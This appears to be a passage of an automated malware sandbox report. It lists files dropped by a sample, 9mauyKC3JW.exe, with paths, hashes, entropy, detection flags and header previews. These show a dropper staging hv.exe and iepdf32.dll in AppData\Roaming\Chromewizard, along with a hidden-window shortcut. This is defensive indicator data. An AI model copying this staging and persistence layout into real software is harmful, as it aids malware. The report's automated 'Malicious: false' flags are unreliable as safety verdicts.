Preview:	[..Y..X..X..Y..\|..L...X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..}k.T.k.E}v.m;X.w7L.X.C.`7].X.^.v,..a6_.TE.v9G.X.^.v,_..X..X..X..X..X..X..X..X..X..X..X...E.j1^.e4C.a.R..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X...E.v=K.a.D.p9D.aX..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..}}.J.c.!.g.gE.k>^.J.~.BK.a/E.oX..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X..X.....4v..3j...X..X..X..X..X..X..X..X..X..X*..

C:\Users\user\AppData\Local\Temp\ICACHE-1D9F26E2.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ICACHE-3DB07D2E.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ICACHE-7851E0C5.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ICACHE-7E2E8142.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ILIST-285C4760.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ILIST-3EBE7AA6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ILIST-57AC6DD5.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ILIST-5B851A26.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ATLEQQXO.exe, Detection: malicious, Browse Filename: ATLEQQXO.exe, Detection: malicious, Browse Filename: upgrade.hta, Detection: malicious, Browse Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse Filename: UolJwovI8c.exe, Detection: malicious, Browse Filename: ONHQNHFT.msi, Detection: malicious, Browse Filename: es.hta, Detection: malicious, Browse Filename: BkTwXj17DH.exe, Detection: malicious, Browse Filename: TVr2Z822J3.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cvnmq

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2588672
Entropy (8bit):	6.714111096542978
Encrypted:	false
SSDEEP:	49152:igj3aKUFQ66gutvqTooLG9svhd31ChrL0ZRj7b9g4KkkC+ITQg7RHyNYGnhdA9D6:sQv306s3RtW7
MD5:	08C63FBD8CFA501F75E8A40A32E41041
SHA1:	850AF6ABFDCF672C97D8CAABCA5B628DE1AD3908
SHA-256:	D4B79564B3913356F04EE52AF2042E8D99594FB0C282B475D598CF415AA750FA
SHA-512:	4CE519E32E3627C6068FA141B09CC024687B50415A8533D113A136EB7F560D886D8D71F4A6E5FAD003190ED21F9CD5B8DC3ECE1DFE067C7247160E2391ED40EB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Y..................$..p'..f..W..........@.............................`........'...`... ......................................................0..8.....&..j...........@.............................. .&.(...................X................................text.....$.......$.................`..`.data.........%.......$.............@....rdata..P.....&.......%.............@..@.pdata...j....&..l....&.............@..@.xdata...R...0'..T....'.............@..@.bss....`e....'..........................idata...............d'.............@....CRT....0............j'.............@....tls......... .......l'.............@....rsrc...8....0.......n'.............@..@.reloc.......@.......p'.............@..Bsii..........P.......t'.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\hv.exe

Download File

Process:	C:\Users\user\Desktop\9mauyKC3JW.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9094368
Entropy (8bit):	6.822465768734483
Encrypted:	false
SSDEEP:	196608:Ywdj1UbkCchr3rlFE8GCWhKUzGZ3gRTFHnBz58//o:Yw91Ubkxhr3rlFHWhKUzGZ3gRTFhzi/o
MD5:	480F8CF600F5509595B8418C6534CAF2
SHA1:	DC13258EBB83BDF956523D751F67E29D6E4CF77E
SHA-256:	6D8905EC0B1DFDC0A10D1CCE40714DDD73205A09AD390B933DDBECDCF06A4CF2
SHA-512:	F0BD99F68D59E80538FB276945D0F383394CB94A35C6D12EBD3E87061222249F78B9CA75716B33E36B66842B97C71149612111FCB6A8A3BC3A97635B03934AAF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...0C.e..................k.........T.k.......l...@..........................`......F.....@......@...................@r.......q..G....y..................&...pr..7...........................`r.....................$.q......0r......................text....k.......k................. ..`.itext.. )....k..*....k............. ..`.data...x.....l.......k.............@....bss....TZ....o..........................idata...G....q..H...ho.............@....didata......0r.......o.............@....edata.......@r.......o.............@..@.tls....d....Pr..........................rdata..]....`r.......o.............@..@.reloc...7...pr..8....o.............@..B.rsrc.........y.......v.............@..@.............`......................@..@................

C:\Users\user\AppData\Local\Temp\iepdf32.dll

Download File

Process:	C:\Users\user\Desktop\9mauyKC3JW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4545536
Entropy (8bit):	7.132330028096879
Encrypted:	false
SSDEEP:	98304:azKnK7RZKZk8AZ1uWhgTsOTb+W5gmTKuCIUMPaFownQCICDQ:JRZkB1WlgmFPa+CICD
MD5:	E3DB6AFB62515EC147015918CBB41E88
SHA1:	52F5074BC4D57CAD731E7C97DB4A9CA636109740
SHA-256:	DB58D478C154E460E78133830D40387DA5E3870FE8EBFA799F6A178FC4C9D054
SHA-512:	52BDA55A91C709767DF8B3E1F38CE3D3DB7B109056A14E038B92EB8B942C0F3D90628974E77C1590C22737A6E5BB5153A3F3887F3E54EA07ED68B742FEB6032E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......d.........."!......&...........#......................................@F.....!.F...@A.........................qC..9..=.C.d.....E.......................E..(..P?C......................>C......EB.............X.C..............................text.....&.......&................. ..`.rdata...E....&..F....&.............@..@.data.........C..X....C.............@....00cfg........D......(D.............@..@.tls..........D......D.............@...malloc_h......D......,D............. ..`.rsrc.........E.......D.............@..@.reloc...)....E.....2D.............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\quwq

Download File

Process:	C:\Users\user\Desktop\9mauyKC3JW.exe
File Type:	data
Category:	dropped
Size (bytes):	63226
Entropy (8bit):	4.525950628745209
Encrypted:	false
SSDEEP:	768:TcwpzR+Xc4tuOcAGZo7BFBidnoNVDr1oLhVXhNC6U64EmBsudXeMu+30nFroewda:9zdAg4BFIGl6XS6UlBsakFrovg
MD5:	9AE57CD30A5F2756173F52A36A409E0F
SHA1:	D420BD051FE7695C8898A6B7F6401169F648B1D6
SHA-256:	5B09F2CCA4D56C667DE09A308CA48FECF1C7577C26FF99EB858799FD6C75ACC3
SHA-512:	9193A32C6D34B6117B53223BFBFA8D6A451F57464FF1A4EEE2D3C75146B257D2E7FCFC6153450F013189769315B8030CC2F1B14EEA0BE3863F075BECE759FA15
Malicious:	false
Preview:	qQ..U._QcY.VJ]..Y.C.f.ShbL.A]v.]Vp....cV..SRlI...M.uZ_.Zd..Ak..v.j...E..UO.M..JL^.Wc.k.Tv...Xe..IFBypRU.RC.l_..Yx....af.lmmS._.V.....d..w...xR..al.o.j.Euo..y.kbp..L.I\..F.T.Z.exq.hab....Va.lyWrZA...R..H[..l.t\kK.B.Hyb_..PIB....Cyc\..v.`.].jO....LN.cc.x..Vw.h.^q..h.K.qsuR.g..P_.DQ.SfJt.[\.Uh.x..snr.pQUb.i.....`......D...yU...yiaIx.KlZQvE..ox..J.i...P....PrlN.O....N.U[.`.KtPb..p...ue...bC..a...S.A.J..r.pRi..h...T..C..^XQ...a.P....]H.wwTj..jO.U...\.....H.K`......M.v...A`.iU.Td...O.j.H..oQK..]G...FSG..Y....D..F......rpBKc..k.H.S..J.Jjr`.D.....i.dRv...k[.qxKd.mR....W.p.yN..GlP.Y...Y.S.Op\.xCLYe[\.reOo...xY..e.........aML.F.Sf..J.F...\c...nrX].v....g...Y.Y._.D.b.F...]..^.l..[..R....txKM].o.eE.iy.R.....G.o.R.wR.P`.\.gk.VT\....QS.RgQJBx.J....o.......G.t....vA..x.f...TiRQm....B\H.TMK....._.....jq..w..W.Qw.h.HEiEZg.s.Q.h.B.uyK..e..uQ...QTq.g..M....d.a`...kV\i.g.o..\ox..W.vc.a......U...p.f..J.n.KQuu.y...j._....SY..U..mNE..t.i.....CV.p..Ge.....e.D.b..X.l....eam..y.K..hl......\...Fr..h._`K......xg.

C:\Users\user\AppData\Local\Temp\tsmbkpqw

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 27 06:15:08 2024, mtime=Fri Dec 27 06:15:10 2024, atime=Tue Dec 17 11:41:50 2024, length=9094368, window=hide
Category:	dropped
Size (bytes):	871
Entropy (8bit):	5.06988650426241
Encrypted:	false
SSDEEP:	12:8PQS49dz4OSkChlY//X+5eL6/F/RhKjAZNHl/eJI9WKmV:8m3zv3x254OGA48WKm
MD5:	1E228FB04C4C299C5B5F37B8A43F64FA
SHA1:	6828BCBF8CEB3A34CDB0EA6FE98BAA33A50877F8
SHA-256:	F917307767E265274963DB2FCD6E6C72870F0F35B3373DE4A2A8099E01191558
SHA-512:	FFF436CEE7E578944587228FAAEF7A4102AF08F704684DF18D4E5211441CF6CFBEE2A948B26BB9890B8C1D808475A6098FF68B3D40B381715B5513E5DB00E915
Malicious:	false
Preview:	L..................F.... ....U../X..'.../X...{...P...........................:..DG..Yr?.D..U..k0.&...&.......y.Yd...t.../X....../X......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.9..........................d...A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW)B.Y.9..............................R.o.a.m.i.n.g.....b.1......Y.9..CHROME~1..J......Y.9.Y.9.....(.....................b^.C.h.r.o.m.e.w.i.z.a.r.d.....T.2.....Y9e .hv.exe..>......Y.9.Y.9.....(........................h.v...e.x.e.......b...............-.......a.............._.....C:\Users\user\AppData\Roaming\Chromewizard\hv.exe..!.....\.....\.R.o.a.m.i.n.g.\.C.h.r.o.m.e.w.i.z.a.r.d.\.h.v...e.x.e.`.......X.......675052...........hT..CrF.f4... .R..Yc...,...E...hT..CrF.f4... .R..Yc...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\wxhsceg

Download File

Process:	C:\Users\user\Desktop\9mauyKC3JW.exe
File Type:	data
Category:	dropped
Size (bytes):	4551445
Entropy (8bit):	7.957419975728077
Encrypted:	false
SSDEEP:	98304:eo/JG7NH2ZIhXD8f5oBj0BjgQSbpr6d8sfWTxwaLS9TfZ2:z/87N22XDu5e8gnPsfWw9U
MD5:	ED0003315889A453764BD67087E27DCB
SHA1:	A5F5398BE3E35A31362EC06A8F7F95922141746B
SHA-256:	C0EE9297F933FDA00F4AF59D1B4107960C3A24836CB260D5532F989DA196DE37
SHA-512:	83D08BBAF47A7E48AA7F857AC277FFD6B0C16AAEA8723928AC9063626618C95AF662A1C8338B7CE45D546253A841788C9B788C2A6A984E6CA1DBE0158B21EE2F
Malicious:	false
Preview:	dll..yc[O...qk.m.RX..Lpkb...ES.L.o.m..k.u...U...\ve...Taqbl.Z...K.a........H_..rFV.r_......F.ywv...Q..v.eM...EcK...y\..H..Ql....du.Z..J.]..uVX.Sn..O..d....\.E...A..V..[.J]..TDQ..G...x.u.rMm.Vc..f....lisM.jNNe.c..r[^..m._......G..oNXn.w.SbAU.T...r^R....r..V..OSFv.K.s_ddhQW^.lyt..h.qCN....po\t..DP..UBtUp.L.Q.h..K.c....q.R..t.OVMW.la.bew.^.wi.YQ.ej..Ibd...EO.kJva.xGR..x..sG.X.i....s.xJy.fp..i....^j...N_..\QW^t.i.xmGF\y.N....p..nXg_..b].K.a..P...T.j.q.N.\s.i.Tm..M..u..h...[.T..G.IOXy^QQ..m....R..rL].....J.L.k].de[..kv..G.b..J.bq.SG..gHCX......e.sK.a.SSW.....vF._..x....VGY.J..FCB.s...n.tu`bR...K.TGr.....Y.k.l_]EM.^fBv.E...^yHY...k.Gp..EfL..e....E.Y....Vfl.A.f.vYq.mGa..e...ju.iNV.S...LAM....sfc..]sA..^.......U.m.....P...^.\......W.x..X..njXN_].....o]Y.Km...g_..B...h.A..r.b.o.l.U.......R..wK.fbe.Z.KZm.JW..n.r.Bd..]..[U...e.d..RM.x.L[P.i...q.....F...g.FN..._YY.vJC...jv`a.Ip.N...e..G..SVx..A^......nYCn...p....oxD....mLjL...mq..C.\.dk.....Z.._J.B.AY.u_HR.....KR.r.R.w....WG..Lk.Bg.bn.EBV\..QP.bQq

C:\Users\user\AppData\Local\Temp\yhg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2588672
Entropy (8bit):	6.714111096542978
Encrypted:	false
SSDEEP:	49152:igj3aKUFQ66gutvqTooLG9svhd31ChrL0ZRj7b9g4KkkC+ITQg7RHyNYGnhdA9D6:sQv306s3RtW7
MD5:	08C63FBD8CFA501F75E8A40A32E41041
SHA1:	850AF6ABFDCF672C97D8CAABCA5B628DE1AD3908
SHA-256:	D4B79564B3913356F04EE52AF2042E8D99594FB0C282B475D598CF415AA750FA
SHA-512:	4CE519E32E3627C6068FA141B09CC024687B50415A8533D113A136EB7F560D886D8D71F4A6E5FAD003190ED21F9CD5B8DC3ECE1DFE067C7247160E2391ED40EB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Y..................$..p'..f..W..........@.............................`........'...`... ......................................................0..8.....&..j...........@.............................. .&.(...................X................................text.....$.......$.................`..`.data.........%.......$.............@....rdata..P.....&.......%.............@..@.pdata...j....&..l....&.............@..@.xdata...R...0'..T....'.............@..@.bss....`e....'..........................idata...............d'.............@....CRT....0............j'.............@....tls......... .......l'.............@....rsrc...8....0.......n'.............@..@.reloc.......@.......p'.............@..Bsii..........P.......t'.............@...................................................................................................................................

C:\Users\user\AppData\Roaming\Chromewizard\hv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\hv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9094368
Entropy (8bit):	6.822465768734483
Encrypted:	false
SSDEEP:	196608:Ywdj1UbkCchr3rlFE8GCWhKUzGZ3gRTFHnBz58//o:Yw91Ubkxhr3rlFHWhKUzGZ3gRTFhzi/o
MD5:	480F8CF600F5509595B8418C6534CAF2
SHA1:	DC13258EBB83BDF956523D751F67E29D6E4CF77E
SHA-256:	6D8905EC0B1DFDC0A10D1CCE40714DDD73205A09AD390B933DDBECDCF06A4CF2
SHA-512:	F0BD99F68D59E80538FB276945D0F383394CB94A35C6D12EBD3E87061222249F78B9CA75716B33E36B66842B97C71149612111FCB6A8A3BC3A97635B03934AAF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...0C.e..................k.........T.k.......l...@..........................`......F.....@......@...................@r.......q..G....y..................&...pr..7...........................`r.....................$.q......0r......................text....k.......k................. ..`.itext.. )....k..*....k............. ..`.data...x.....l.......k.............@....bss....TZ....o..........................idata...G....q..H...ho.............@....didata......0r.......o.............@....edata.......@r.......o.............@..@.tls....d....Pr..........................rdata..]....`r.......o.............@..@.reloc...7...pr..8....o.............@..B.rsrc.........y.......v.............@..@.............`......................@..@................

C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\hv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4545536
Entropy (8bit):	7.132330028096879
Encrypted:	false
SSDEEP:	98304:azKnK7RZKZk8AZ1uWhgTsOTb+W5gmTKuCIUMPaFownQCICDQ:JRZkB1WlgmFPa+CICD
MD5:	E3DB6AFB62515EC147015918CBB41E88
SHA1:	52F5074BC4D57CAD731E7C97DB4A9CA636109740
SHA-256:	DB58D478C154E460E78133830D40387DA5E3870FE8EBFA799F6A178FC4C9D054
SHA-512:	52BDA55A91C709767DF8B3E1F38CE3D3DB7B109056A14E038B92EB8B942C0F3D90628974E77C1590C22737A6E5BB5153A3F3887F3E54EA07ED68B742FEB6032E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......d.........."!......&...........#......................................@F.....!.F...@A.........................qC..9..=.C.d.....E.......................E..(..P?C......................>C......EB.............X.C..............................text.....&.......&................. ..`.rdata...E....&..F....&.............@..@.data.........C..X....C.............@....00cfg........D......(D.............@..@.tls..........D......D.............@...malloc_h......D......,D............. ..`.rsrc.........E.......D.............@..@.reloc...)....E.....2D.............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Chromewizard\quwq

Download File

Process:	C:\Users\user\AppData\Local\Temp\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	63226
Entropy (8bit):	4.525950628745209
Encrypted:	false
SSDEEP:	768:TcwpzR+Xc4tuOcAGZo7BFBidnoNVDr1oLhVXhNC6U64EmBsudXeMu+30nFroewda:9zdAg4BFIGl6XS6UlBsakFrovg
MD5:	9AE57CD30A5F2756173F52A36A409E0F
SHA1:	D420BD051FE7695C8898A6B7F6401169F648B1D6
SHA-256:	5B09F2CCA4D56C667DE09A308CA48FECF1C7577C26FF99EB858799FD6C75ACC3
SHA-512:	9193A32C6D34B6117B53223BFBFA8D6A451F57464FF1A4EEE2D3C75146B257D2E7FCFC6153450F013189769315B8030CC2F1B14EEA0BE3863F075BECE759FA15
Malicious:	false
Preview:	qQ..U._QcY.VJ]..Y.C.f.ShbL.A]v.]Vp....cV..SRlI...M.uZ_.Zd..Ak..v.j...E..UO.M..JL^.Wc.k.Tv...Xe..IFBypRU.RC.l_..Yx....af.lmmS._.V.....d..w...xR..al.o.j.Euo..y.kbp..L.I\..F.T.Z.exq.hab....Va.lyWrZA...R..H[..l.t\kK.B.Hyb_..PIB....Cyc\..v.`.].jO....LN.cc.x..Vw.h.^q..h.K.qsuR.g..P_.DQ.SfJt.[\.Uh.x..snr.pQUb.i.....`......D...yU...yiaIx.KlZQvE..ox..J.i...P....PrlN.O....N.U[.`.KtPb..p...ue...bC..a...S.A.J..r.pRi..h...T..C..^XQ...a.P....]H.wwTj..jO.U...\.....H.K`......M.v...A`.iU.Td...O.j.H..oQK..]G...FSG..Y....D..F......rpBKc..k.H.S..J.Jjr`.D.....i.dRv...k[.qxKd.mR....W.p.yN..GlP.Y...Y.S.Op\.xCLYe[\.reOo...xY..e.........aML.F.Sf..J.F...\c...nrX].v....g...Y.Y._.D.b.F...]..^.l..[..R....txKM].o.eE.iy.R.....G.o.R.wR.P`.\.gk.VT\....QS.RgQJBx.J....o.......G.t....vA..x.f...TiRQm....B\H.TMK....._.....jq..w..W.Qw.h.HEiEZg.s.Q.h.B.uyK..e..uQ...QTq.g..M....d.a`...kV\i.g.o..\ox..W.vc.a......U...p.f..J.n.KQuu.y...j._....SY..U..mNE..t.i.....CV.p..Ge.....e.D.b..X.l....eam..y.K..hl......\...Fr..h._`K......xg.

C:\Users\user\AppData\Roaming\Chromewizard\wxhsceg

Download File

Process:	C:\Users\user\AppData\Local\Temp\hv.exe
File Type:	data
Category:	dropped
Size (bytes):	4551445
Entropy (8bit):	7.957419975728077
Encrypted:	false
SSDEEP:	98304:eo/JG7NH2ZIhXD8f5oBj0BjgQSbpr6d8sfWTxwaLS9TfZ2:z/87N22XDu5e8gnPsfWw9U
MD5:	ED0003315889A453764BD67087E27DCB
SHA1:	A5F5398BE3E35A31362EC06A8F7F95922141746B
SHA-256:	C0EE9297F933FDA00F4AF59D1B4107960C3A24836CB260D5532F989DA196DE37
SHA-512:	83D08BBAF47A7E48AA7F857AC277FFD6B0C16AAEA8723928AC9063626618C95AF662A1C8338B7CE45D546253A841788C9B788C2A6A984E6CA1DBE0158B21EE2F
Malicious:	false
